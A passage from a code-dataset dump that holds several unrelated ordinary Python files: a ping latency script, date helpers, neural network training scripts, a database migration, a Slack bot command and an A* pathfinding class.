main()\n","sub_path":"sss_object_detection/scripts/sim_lines_wf.py","file_name":"sim_lines_wf.py","file_ext":"py","file_size_in_byte":14738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"188602957","text":"import json\nimport subprocess\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plot\nfrom matplotlib.backends import backend_pdf\n\nhostnames = []\nwith open('alexa_top_100', 'r') as f:\n\tfor i in range(100):\n\t\thost_with_line = f.readline()\n\t\thost = host_with_line.split(\"\\n\")[0]\n\t\thostnames.append(host)\n\ndef run_ping(hostnames, num_packets, raw_ping_output_filename, aggregate_ping_output_filename):\n\trtts = {}\n\tfor host in hostnames:\n\t\targs = 'ping -c ' + str(num_packets + 1) + ' ' + host\n\t\tp = subprocess.Popen(args, stdout=subprocess.PIPE, shell=True)\n\t\toutput = p.communicate()[0]\n\t\toutput = str(output)\n\t\toutput_arr = output.split('\\n')\n\t\tfor line in output_arr:\n\t\t\ttime_re = re.compile('time=(\\d+\\.\\d+)')\n\t\t\tmatch = time_re.search(line)\n\t\t\ttime = -1.0\n\t\t\tif match:\n\t\t\t\ttime_str = match.group(0)[5:]\n\t\t\t\ttime = float(time_str)\n\t\t\telse:\n\t\t\t\tif \"Request timeout\" not in line:\n\t\t\t\t\tcontinue\n\t\t\tif rtts.has_key(host):\n\t\t\t\toriginal = rtts[host]\n\t\t\t\tnew = original + [time]\n\t\t\t\trtts[host] = new\n\t\t\telse:\n\t\t\t\trtts[host] = [time]\n\traw_output = json.dumps(rtts)\n\twith open(raw_ping_output_filename, 'w') as f:\n\t\tf.write(raw_output)\n\tagg_rtts = {}\n\tfor host in rtts:\n\t\tsent_packets = [x for x in rtts[host] if x != -1.0]\n\t\tmax_rtt = -1.0\n\t\tmedian_rtt = -1.0\n\t\tif len(sent_packets) != 0:\n\t\t\tmax_rtt = np.amax(sent_packets)\n\t\t\tmedian_rtt = np.median(sent_packets)\n\t\tnum_drops = rtts[host].count(-1.0)\n\t\tnum_packets = len(rtts[host])\n\t\tdrop_rate = 1.0 * num_drops / num_packets\n\t\tresult_dict = {'drop_rate': drop_rate, 'max_rtt': max_rtt, 'median_rtt': median_rtt}\n\t\tagg_rtts[host] = result_dict\n\tagg_output = json.dumps(agg_rtts)\n\twith open(aggregate_ping_output_filename, 'w') as f:\n\t\tf.write(agg_output)\n\ndef plot_median_rtt_cdf(agg_ping_results_filename, output_cdf_filename):\n\tx_values = [0]\n\ty_values = [0]\n\tplot.plot(x_values, y_values, label=\"Median RTTs\")\n\tplot.legend()\n\tplot.grid()\n\tplot.xlabel(\"x axis\")\n\tplot.ylabel(\"y axis\")\n\tplot.show()\n\tfilepath = 'median_rtt_plot.pdf'\n\twith backend_pdf.PdfPages(filepath) as pdf:\n\t\tpdf.savefig()\n\ndef plot_ping_cdf(raw_ping_results_filename, output_cdf_filename):\n\tx_values = [0]\n\ty_values = [0]\n\tplot.plot(x_values, y_values, label=\"Pings\")\n\tplot.legend()\n\tplot.grid()\n\tplot.xlabel(\"x axis\")\n\tplot.ylabel(\"y axis\")\n\tplot.show()\n\tfilepath = 'ping_plot.pdf'\n\twith backend_pdf.PdfPages(filepath) as pdf:\n\t\tpdf.savefig()\n\nrun_ping(hostnames, 10, 'rtt_a_raw.json', 'rtt_a_agg.json')\n","sub_path":"proj3_measurement/rtts2.py","file_name":"rtts2.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"77350220","text":"'''\nCreated on Mar 11, 2010\n\n@author: jared.oyler\n\n##Modified by Tony Chang 03/21/2014 for python 3.x\n'''\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom calendar import Calendar\nimport calendar\nimport numpy\n\nA_DAY = timedelta(days=1)\nA_WEEK = timedelta(days=7)\nTWO_WEEKS = timedelta(days=14)\n\nDATE=\"DATE\"\nYMD=\"YMD\"\nYEAR=\"YEAR\"\nMONTH=\"MONTH\"\nDAY=\"DAY\"\nYDAY=\"YDAY\"\n\nMTH_SRT_END_DATES = {1:(datetime(2003,1,1),datetime(2003,1,31)),\n 2:(datetime(2003,2,1),datetime(2003,2,28)),\n 3:(datetime(2003,3,1),datetime(2003,3,31)),\n 4:(datetime(2003,4,1),datetime(2003,4,30)),\n 5:(datetime(2003,5,1),datetime(2003,5,31)),\n 6:(datetime(2003,6,1),datetime(2003,6,30)),\n 7:(datetime(2003,7,1),datetime(2003,7,31)),\n 8:(datetime(2003,8,1),datetime(2003,8,31)),\n 9:(datetime(2003,9,1),datetime(2003,9,30)),\n 10:(datetime(2003,10,1),datetime(2003,10,31)),\n 11:(datetime(2003,11,1),datetime(2003,11,30)),\n 12:(datetime(2003,12,1),datetime(2003,12,31))}\n\ndef get_date_array_from_strings(strings,format=\"%Y-%m-%d\"):\n \n return numpy.array([datetime.strptime(date,format) for date in strings])\n\ndef get_date_array(str_date,end_date):\n \n date=str_date\n dates=[]\n while date <= end_date:\n dates.append(date)\n date=date + A_DAY\n return numpy.array(dates)\n\ndef get_year_array(dates):\n years=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n years[x] = dates[x].year\n return years\n\ndef get_year_day_array(dates):\n days=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n days[x] = dates[x].timetuple().tm_yday\n return days\n\ndef get_month_day_array(dates):\n days=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n days[x] = dates[x].day\n return days\n\ndef get_month_array(dates):\n months=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n months[x] = dates[x].month\n return months\n\ndef get_ymd_array(dates):\n ymds=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n ymds[x] = ymdL(dates[x])\n return ymds\n\ndef get_md_array(dates):\n mds=numpy.zeros(dates.size,dtype=numpy.int32)\n date_nums = numpy.arange(dates.size)\n for x in date_nums:\n mds[x] = mdL(dates[x])\n return mds\n\ndef get_mth_str_end_dates(mth,yr):\n num_days = calendar.monthrange(yr,mth)[1]\n str_date = datetime(yr,mth,1)\n end_date = str_date + timedelta(days=int(num_days)-1)\n return str_date,end_date\n\ndef get_day_array(year,month):\n return numpy.arange(1,calendar.monthrange(year, month)[1]+1)\n\ndef dates_in_dates(dates,all_dates):\n ymds = get_ymd_array(dates)\n all_ymds = get_ymd_array(all_dates)\n \n return numpy.in1d(all_ymds, ymds, assume_unique=True)\n \ndef ymdL_to_date(ymd):\n return datetime.strptime(str(ymd),\"%Y%m%d\")\n\ndef mdL(date):\n return int(datetime.strftime(date,\"%m%d\"))\n \ndef ymdL(date):\n try:\n return int(datetime.strftime(date,\"%Y%m%d\"))\n except ValueError:\n return int(\"%d%02d%02d\"%(date.year,date.month,date.day))\n\ndef get_days_metadata(srtDate=datetime(1948,1,1),endDate=datetime(2011,12,31)):\n\n dates = get_date_array(srtDate, endDate)\n days_metadata = numpy.recarray(dates.size,dtype=[(DATE,numpy.object_),(YEAR,numpy.int32),(MONTH,numpy.int32),(DAY,numpy.int32),(YDAY,numpy.int32),(YMD,numpy.int32)])\n days_metadata[DATE] = dates\n days_metadata[YEAR] = get_year_array(dates)\n days_metadata[MONTH] = get_month_array(dates)\n days_metadata[DAY] = get_month_day_array(dates)\n days_metadata[YDAY] = get_year_day_array(dates)\n days_metadata[YMD] = get_ymd_array(dates)\n return days_metadata\n\ndef get_days_metadata_dates(dates):\n\n days_metadata = numpy.recarray(dates.size,dtype=[(DATE,numpy.object_),(YEAR,numpy.int32),(MONTH,numpy.int32),(DAY,numpy.int32),(YDAY,numpy.int32),(YMD,numpy.int32)])\n days_metadata[DATE] = dates\n days_metadata[YEAR] = get_year_array(dates)\n days_metadata[MONTH] = get_month_array(dates)\n days_metadata[DAY] = get_month_day_array(dates)\n days_metadata[YDAY] = get_year_day_array(dates)\n days_metadata[YMD] = get_ymd_array(dates)\n return days_metadata \n\ndef get_mth_metadata(str_yr,end_yr):\n \n dates = get_date_mth_array(str_yr, end_yr)\n mth_metadata = numpy.recarray(dates.size,dtype=[(DATE,numpy.object_),(YEAR,numpy.int32),(MONTH,numpy.int32),(YMD,numpy.int32)])\n mth_metadata[DATE] = dates\n mth_metadata[YEAR] = get_year_array(dates)\n mth_metadata[MONTH] = get_month_array(dates)\n mth_metadata[YMD] = get_ymd_array(dates)\n return mth_metadata\n\ndef get_date_yr_array(str_yr,end_yr):\n \n yrs = numpy.arange(str_yr,end_yr+1)\n \n dates=[]\n for yr in yrs:\n \n dates.append(datetime(yr,1,1))\n \n return numpy.array(dates)\n\ndef get_date_mth_array(str_yr,end_yr):\n \n yrs = numpy.arange(str_yr,end_yr+1)\n mths = numpy.arange(1,13)\n \n dates=[]\n for yr in yrs:\n \n for mth in mths:\n \n dates.append(datetime(yr,mth,1))\n \n return numpy.array(dates) ","sub_path":"climate/util_dates.py","file_name":"util_dates.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"316250606","text":"import pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom common import process_data\nfrom common import statistics as stat\nimport time\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, BatchNormalization\nfrom keras.regularizers import l2\nfrom common import load_csv\nfrom common import process_data_from_Yassine\n\n# turn off warning: SettingWithCopyWarning\npd.set_option('chained_assignment', None)\n\n# x, y = load_csv.load_data(True)\n# x_train = process_data.get_clean_data(x)\n# x_train = x_train.drop(['Survived'], axis=1)\n\nprocess_data = process_data_from_Yassine.ProcessData(train_data_ratio=0.9)\nprocess_data.feature_engineering()\ntrain_data = process_data.get_train_data()\ny = train_data.Survived\nx_train = train_data.drop(['Survived'], axis=1)\n\n# x_train = process_data.get_feature_importances(x_train.columns.values, x_train.values, y.values)\n# stat.show_statistics(x)\n\nprint('x_train.shape: ', x_train.shape)\nprint('x_train.columns => \\n', x_train.columns.values)\nprint('y.shape: ', y.shape)\n\nx_train = StandardScaler().fit_transform(x_train.values)\n\nmodel = Sequential()\nmodel.add(Dense(units=30, input_dim=x_train.shape[1], kernel_regularizer=l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\n# model.add(Dense(units=30, input_dim=9,\n# # kernel_initializer='uniform',\n# kernel_regularizer=l2(0.01),\n# activation='relu'))\nmodel.add(Dense(units=30, kernel_regularizer=l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dense(units=30, kernel_regularizer=l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dense(units=30, kernel_regularizer=l2(0.01)))\nmodel.add(BatchNormalization())\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.4))\nmodel.add(Dense(units=1, activation='sigmoid'))\nprint(model.summary())\n\nepochs = 30\n# from keras.optimizers import Adam\n# learning_rate = 0.001\n# adam = Adam(lr=learning_rate, decay=0.0001)\n# model.compile(loss='binary_crossentropy',\n# optimizer=adam, metrics=['accuracy'])\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam', metrics=['accuracy'])\nstart = time.time()\ntrain_history = model.fit(x=x_train,\n y=y,\n validation_split=0.1,\n epochs=epochs,\n shuffle=True,\n batch_size=20, verbose=2)\ntrain_acc, validation_acc = stat.show_train_history(train_history, epochs, 'acc', 'val_acc', 'accuracy')\ntrain_loss, validation_loss = stat.show_train_history(train_history, epochs, 'loss', 'val_loss', 'loss')\n\nend = time.time()\nelapsed_train_time = 'elapsed training time: {} min, {} sec '.format(int((end - start) / 60), int((end - start) % 60))\nprint(elapsed_train_time)\n\nmodel.save('mlp_train_model.h5')\n\nwith open('mlp_train_info.txt', 'w') as file:\n file.write(elapsed_train_time+'\\n')\n file.write('train accuracy = {}, validation accuracy = {}\\n'.format(train_acc, validation_acc))\n file.write('train loss = {}, validation loss = {}\\n'.format(train_loss, validation_loss))\n","sub_path":"submission/submission16/mlp_train.py","file_name":"mlp_train.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"37062718","text":"# -*- coding: utf-8 -*-\n\n\ndef handler(event, context):\n\n res = {}\n res['method'] = event['context']['http-method']\n res['url'] = event['params']['path']\n res['query-string'] = event['params']['querystring']\n res['json-body'] = event['body-json']\n\n return res","sub_path":"dev/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"142965381","text":"\"\"\"empty message\n\nRevision ID: e4b34b113a6a\nRevises: 4fe0f80e5015\nCreate Date: 2021-09-16 00:21:33.668579\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e4b34b113a6a'\ndown_revision = '4fe0f80e5015'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pet',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=50), nullable=True),\n sa.Column('location', sa.String(length=100), nullable=True),\n sa.Column('animal', sa.String(length=100), nullable=True),\n sa.Column('breed', sa.String(length=200), nullable=True),\n sa.Column('image_url', sa.String(length=200), nullable=True),\n sa.Column('contact', sa.String(length=200), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('liked',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('pet_id', sa.Integer(), nullable=True),\n sa.Column('liked_on', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['pet_id'], ['pet.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('liked')\n op.drop_table('pet')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/e4b34b113a6a_.py","file_name":"e4b34b113a6a_.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"24169280","text":"def solution(N, stages):\n fail = [0 for _ in range(N+1)]\n tried = [0 for _ in range(N+1)]\n for stage in stages:\n tried[stage-1] += 1\n for i in range(len(tried)):\n fail[i] = sum(tried[i:])\n ans = []\n for i in range(N):\n if fail[i] != 0:\n ans.append((i+1, (tried[i])/fail[i]))\n else:\n ans.append((i+1, 0))\n ans.sort(key = lambda x: [-x[1], x[0]])\n answer = []\n for a in ans:\n answer.append(a[0])\n return answer","sub_path":"Programmers/2019 KAKAO/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"639293765","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndef plot_data(X):\n plt.plot(X[:, 0], X[:, 1], 'k.', markersize=2)\n\ndef plot_centroids(centroids, weights=None, circle_color='w', cross_color='k'):\n if weights is not None:\n centroids = centroids[weights > weights.max() / 10]\n plt.scatter(centroids[:, 0], centroids[:, 1],\n marker='o', s=30, linewidths=8,\n color=circle_color, zorder=10, alpha=0.9)\n plt.scatter(centroids[:, 0], centroids[:, 1],\n marker='x', s=50, linewidths=50,\n color=cross_color, zorder=11, alpha=1)\n\ndef plot_decision_boundaries(clusterer, X, resolution=1000, show_centroids=True,\n show_xlabels=True, show_ylabels=True):\n mins = X.min(axis=0) - 0.1\n maxs = X.max(axis=0) + 0.1\n xx, yy = np.meshgrid(np.linspace(mins[0], maxs[0], resolution),\n np.linspace(mins[1], maxs[1], resolution))\n Z = clusterer.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n\n plt.contourf(Z, extent=(mins[0], maxs[0], mins[1], maxs[1]),\n cmap=\"Pastel2\")\n plt.contour(Z, extent=(mins[0], maxs[0], mins[1], maxs[1]),\n linewidths=1, colors='k')\n plot_data(X)\n if show_centroids:\n plot_centroids(clusterer.cluster_centers_)\n\n if show_xlabels:\n plt.xlabel(\"$x_1$\", fontsize=14)\n else:\n plt.tick_params(labelbottom='off')\n if show_ylabels:\n plt.ylabel(\"$x_2$\", fontsize=14, rotation=0)\n else:\n plt.tick_params(labelleft='off')","sub_path":"Clustering/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"476193691","text":"import torch\nfrom torch import nn\nimport pytorch_lightning as pl\nfrom pytorch_lightning.metrics import functional as FM\n\nfrom modules import data\nfrom vanilla.deep_emotion import DeepEmotion as DeepEmotionV\nfrom modules.data__ import JAFFEDataModule\n\nfrom vanilla.neutralizer import GrayVGGEncoder, GrayVGGDecoder\n\n\nclass Neutralizer(pl.LightningModule):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.encoder = GrayVGGEncoder()\n self.decoder = GrayVGGDecoder()\n\n def forward(self, x):\n latent = self.encoder(x)\n neutralized = self.decoder(latent)\n\n return {\n 'latent': latent,\n 'neutralized': neutralized\n }\n\n def training_step(self, batch, batch_idx):\n image, desc = batch\n label = desc['exp']\n neutral = desc['neutral']\n\n\nclass DeepEmotion(pl.LightningModule):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.vanilla = DeepEmotionV()\n\n def forward(self, x):\n return self.vanilla.forward(x)\n\n def training_step(self, batch, batch_idx):\n # training_step defined the train loop. It is independent of forward\n image, desc = batch\n label = desc['exp']\n\n predictions = self(image)\n\n loss = nn.functional.cross_entropy(predictions, label)\n print(loss)\n result = pl.TrainResult(loss)\n result.log('train_loss', loss)\n\n return result\n\n # def test_step(self, batch, batch_idx):\n # image, desc = batch\n # label = desc['exp']\n #\n # predictions = self(image)\n #\n # loss = nn.functional.cross_entropy(predictions, label)\n #\n # label_hat = predictions.argmax(dim=1).flatten()\n #\n # accuracy = FM.accuracy(label, label_hat, num_classes=len(data.Expression))\n #\n # result = pl.EvalResult(checkpoint_on=loss)\n #\n # result.batch_acc = accuracy\n # result.batch_len = label.shape[0]\n # result.batch_loss = loss\n #\n # return result\n #\n # def test_epoch_end(self, outputs):\n # all_accs = outputs.batch_acc\n # all_loss = outputs.batch_loss\n # all_lens = outputs.batch_len\n # all_lens = torch.tensor(all_lens, dtype=torch.float, device=self.device)\n #\n # epoch_acc = torch.dot(all_accs, all_lens) / all_lens.sum()\n # epoch_loss = torch.dot(all_loss, all_lens) / all_lens.sum()\n #\n # result = pl.EvalResult(checkpoint_on=epoch_loss)\n #\n # result.log('test_acc', epoch_acc, on_step=False, on_epoch=True)\n # result.log('test_loss', epoch_loss, on_step=False, on_epoch=True)\n #\n # return result\n #\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)\n return optimizer\n\n\nif __name__ == '__main__':\n pl.seed_everything(42)\n\n jaffe_dm = JAFFEDataModule(img_size=data.IMG_SIZE_DEEP_EMOTION)\n jaffe_dm.setup()\n\n model = DeepEmotion()\n\n # trainer = pl.Trainer(gpus=-1, max_epochs=6)\n trainer = pl.Trainer(max_epochs=2, row_log_interval=1)\n trainer.fit(model, jaffe_dm)\n # trainer.test(deep_emotion, jaffe.test_dataloader())\n # trainer.test(model_l, test_dataloaders=valid_dl)\n","sub_path":"modules/neutralizer.py","file_name":"neutralizer.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"156091709","text":"__author__ = 'yongkang'\n#coding=utf-8\n\nimport sys\nsys.path.append(\"..\")\nfrom Source.login import Login\nimport Source.host\nimport unittest\nimport json\nimport requests\nimport time\n\nres = Login.login('')\ntoken = res['data']['token']\n\nclass addNotice(unittest.TestCase):\n \"开投提醒\"\n\n def setUp(self):\n print(\"开始执行\")\n\n def tearDown(self):\n print(\"结束执行\")\n\n def test_addnotie_no(self):\n \"未设置开投提醒\"\n url = Source.host.host() + '/project/addNotice'\n headers = {'DIVERSION-VERSION':12,'SESSION-TOKEN':token}\n params = {'deal_id':3524}\n req = requests.get(url,headers = headers,params = params)\n data = json.loads(req.text)\n result = json.dumps(data,ensure_ascii=False,indent=1)\n print(result)\n self.assertEqual(req.status_code,200)\n self.assertEqual(data['errno'],0)\n return data\n\n time.sleep(3)\n\n def test_addnotie_have(self):\n \"已设置开投提醒\"\n url = Source.host.host() + '/project/addNotice'\n headers = {'DIVERSION-VERSION':12,'SESSION-TOKEN':token}\n params = {'deal_id':3522}\n req = requests.get(url,headers = headers,params = params)\n data = json.loads(req.text)\n result = json.dumps(data,ensure_ascii=False,indent=1)\n print(result)\n self.assertEqual(req.status_code,200)\n self.assertEqual(data['errno'],100004)\n return data\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"APP1.2/TestCase/test_addNotice.py","file_name":"test_addNotice.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"527520261","text":"'''Read file (either output of Traveltime_and_trips.py) and by treating data as\nstratified with stratum size = 'period' days, ruturns graph of optimal period.\n'''\n\nfrom sys import argv\nfrom numpy import mean, var\nfrom matplotlib.pyplot import plot, xlabel, ylabel, axis, show\n\n# Store readfile contents into list data.\nwith open(argv[1], 'r') as readfile:\n data = []\n for line in readfile:\n if len(line):\n data.append(float(line[0:-1]))\n\n# Rearrange data so that hours now increase instead of decreasing.\ndata.reverse()\n\n# Assume different 'periods' in the data, seperate data into bins and calculate\n# variance for data srtatified thusly.\nSTART_PERIOD_VALUE = 2\nEND_PERIOD_VALUE = 39\ncumulative_strata_variances = {period:0 for period in\n range(START_PERIOD_VALUE, END_PERIOD_VALUE+1)}\n\nfor period in range(START_PERIOD_VALUE, END_PERIOD_VALUE + 1):\n # Convert period in days to period in hours.\n period_in_hours = 24 * period\n # Initialization\n stratified_data = [[] for i in range(period_in_hours)]\n stratified_data_inferred = [[] for i in range(period_in_hours)]\n stratified_means = [0 for i in range(period_in_hours)]\n stratified_variances = [0 for i in range(period_in_hours)]\n # Stratify the data, ignore '-1' values.\n for i in range(len(data)):\n hour = i % period_in_hours\n if data[i] != -1:\n stratified_data[hour].append(data[i])\n # Record means of each stratum (we've ignored the '-1' values).\n for i in range(period_in_hours):\n stratum_mean = round(mean(stratified_data[i]), 2)\n stratified_means[i] = stratum_mean\n # Replace '-1' (missing) values with stratum mean. This is inferred data,\n # no more true data.\n for i in range(len(data)):\n hour = i % period_in_hours\n if data[i] != -1:\n stratified_data_inferred[hour].append(data[i])\n else:\n stratified_data_inferred[hour].append(stratified_means[hour])\n # Record variance of each stratum\n for i in range(period_in_hours):\n stratum_variance = round(var(stratified_data_inferred[i]), 2)\n stratified_variances[i] = stratum_variance\n # Record the mean of stratum variances across all strata\n cumulative_strata_variances[period] = mean(stratified_variances)\n print (\"Period = %d, Cumulative Strata Variance = %d\"\n %(period, cumulative_strata_variances[period]))\n\n# Dips in plot correspond to low cumulative variance i.e. high periodicity\n# trend.\nplot(cumulative_strata_variances.keys(),\n cumulative_strata_variances.values(),'o')\nylabel('Cumulative variance of stratified data')\nxlabel('Assumed period of data')\nshow()\n","sub_path":"Periodicity_analysis.py","file_name":"Periodicity_analysis.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"421378063","text":"\"\"\"\nSlack Bot Track Command\n\"\"\"\n\nimport logging\nimport requests\nimport pendulum\n\nfrom ebr_trackerbot.bot import register_command\nfrom time_utility import parse_time_delta_input\n\n\ndef show_command(text, result, payload, config, commands):\n \"\"\"\n Slack Bot Show Command\n \"\"\"\n\n target_test = result.group(1)\n duration = result.group(2)\n\n logging.debug(\"Show command on \" + target_test + \" over \" + duration)\n\n time_now = pendulum.now(\"UTC\")\n\n start = parse_time_delta_input(duration, time_now)\n\n response = requests.get(\n config[\"api_url\"],\n params={\"test_status\": \"failed\", \"start\": start.to_iso8601_string(), \"end\": time_now.to_iso8601_string()},\n headers={\"accept\": \"application/json\"},\n )\n\n channel_id = payload[\"data\"][\"channel\"]\n thread_ts = payload[\"data\"][\"ts\"]\n\n if \"tests\" not in response.json():\n logging.warning(\"Invalid JSON from api call. Does not contains tests field.\")\n payload[\"web_client\"].chat_postMessage(\n channel=channel_id, text=\"Something went wrong, please report this failure.\", thread_ts=thread_ts\n )\n return\n\n for test in response.json()[\"tests\"]:\n full_name = test[\"full_name\"]\n if full_name == target_test:\n count = str(test[\"count\"])\n payload[\"web_client\"].chat_postMessage(\n channel=channel_id,\n text=\"Test *{test}* failed {count} times over the last {duration}\".format(\n test=target_test, count=count, duration=duration\n ),\n thread_ts=thread_ts,\n )\n break\n else:\n payload[\"web_client\"].chat_postMessage(\n channel=channel_id,\n text=\"Test *{test}* never failed over {duration}\".format(test=target_test, duration=duration),\n thread_ts=thread_ts,\n )\n\n\nregister_command(\n \"show\",\n \"Shows the current status of a test over the past time interval. Command syntax: show full_testname over time_interval.\"\n + \"Time interval can contain *s* - seconds, *m* - minutes, *h* - hours, *d* - days\"\n + \"(eg. 20d5h10m5s)\",\n \"^show ([^ ]+) over ((?:[0-9]+(?:s|m|h|d))+)$\",\n show_command,\n)\nlogging.info(\"Show command registered\")\n","sub_path":"ebr_trackerbot/command/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"431888833","text":"\"\"\" Storage backend implementations \"\"\"\nfrom functools import partial\n\nfrom .base import IStorage\nfrom .files import FileStorage\nfrom .s3 import S3Storage, CloudFrontS3Storage\n\nfrom pyramid.path import DottedNameResolver\n\n\ndef get_storage_impl(settings):\n \"\"\" Get and configure the storage backend wrapper \"\"\"\n resolver = DottedNameResolver(__name__)\n storage = settings.get('pypi.storage', 'file')\n if storage == 's3':\n storage = 'pypicloud.storage.S3Storage'\n elif storage == 'cloudfront':\n storage = 'pypicloud.storage.CloudFrontS3Storage'\n elif storage == 'file':\n storage = 'pypicloud.storage.FileStorage'\n storage_impl = resolver.resolve(storage)\n kwargs = storage_impl.configure(settings)\n return partial(storage_impl, **kwargs)\n","sub_path":"pypicloud/storage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645747005","text":"class Node:\n def __init__(self, parent=None, node=None, pos=None):\n self.parent = parent\n self.node = node\n self.pos = pos\n self.g = 0\n self.h = 0\n self.f = 0\n\n def __eq__(self, other):\n return self.pos == other.pos\n\n\nclass AStarAlgorithm:\n def __init__(self, graph, positions):\n self.graph = graph\n self.positions = positions\n self.start_node = len(graph.nodes) - 2\n self.end_node = len(graph.nodes) - 1\n self.weight = 1\n self.search()\n\n def display(self):\n print(self.graph.nodes)\n print(self.start_node)\n print(self.end_node)\n print(self.graph.edges)\n\n def return_path(self, item_node):\n path = []\n current = item_node\n while current is not None:\n path.append(current)\n current = current.parent\n path = path[::-1]\n print(\"--------------- A star search path --------------\")\n print_string = \"\"\n for i in range(len(path)):\n p_item = path[i]\n print_string += str(p_item.node) + \" --> \"\n # if i == 0 or i == len(path) - 1:\n # print_string += str(p_item.node) + \" --> \"\n # else:\n # print_string += str(p_item.pos) + \" --> \"\n print(print_string[:-5])\n\n def get_children(self, item_node):\n res_nodes = []\n connected_edges = self.graph.edges(item_node.node)\n for edge in connected_edges:\n if not edge[0] == item_node.node:\n res_nodes.append(Node(item_node, edge[0], self.positions[edge[0]]))\n if not edge[1] == item_node.node:\n res_nodes.append(Node(item_node, edge[1], self.positions[edge[1]]))\n return res_nodes\n\n def search(self):\n start_node = Node(None, self.start_node, self.positions[self.start_node])\n start_node.g = start_node.h = start_node.f = 0\n end_node = Node(None, self.end_node, self.positions[self.end_node])\n end_node.g = end_node.h = end_node.f = 0\n open_list = []\n close_list = []\n open_list.append(start_node)\n outer_iterations = 0\n max_iterations = 1000\n # loop until you get the target\n while len(open_list) > 0:\n # Every time any node is referred from open_list\n outer_iterations += 1\n # Get the current node\n current_node = open_list[0]\n current_index = 0\n for index, item in enumerate(open_list):\n if item.f < current_node.f:\n current_node = item\n current_index = index\n # if path is greater than max_iterations, stop search\n if outer_iterations > max_iterations:\n print(\"Too many iterations for given start, end\")\n return self.return_path(current_node)\n # Pop current node out off yet_to_visit list, add to visited list\n open_list.pop(current_index)\n close_list.append(current_node)\n # test if goal is reached or not, if yes then return the path\n if current_node == end_node:\n return self.return_path(current_node)\n children = self.get_children(current_node)\n # Loop through children\n for child in children:\n # Child is on the visited list (search entire visited list)\n if len([close_item for close_item in close_list if close_item == child]) > 0:\n continue\n # Create the f, g, and h values\n child.g = current_node.g + self.weight\n child.h = abs(child.pos[0] - end_node.pos[0]) + abs(child.pos[1] - end_node.pos[1])\n child.f = child.g + child.h\n # Child is already in the open_list and g cost is already lower\n if len([i for i in open_list if child == i and child.g > i.g]) > 0:\n continue\n open_list.append(child)\n","sub_path":"code/python/AStarAlgorithm.py","file_name":"AStarAlgorithm.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"289016600","text":"from termcolor import 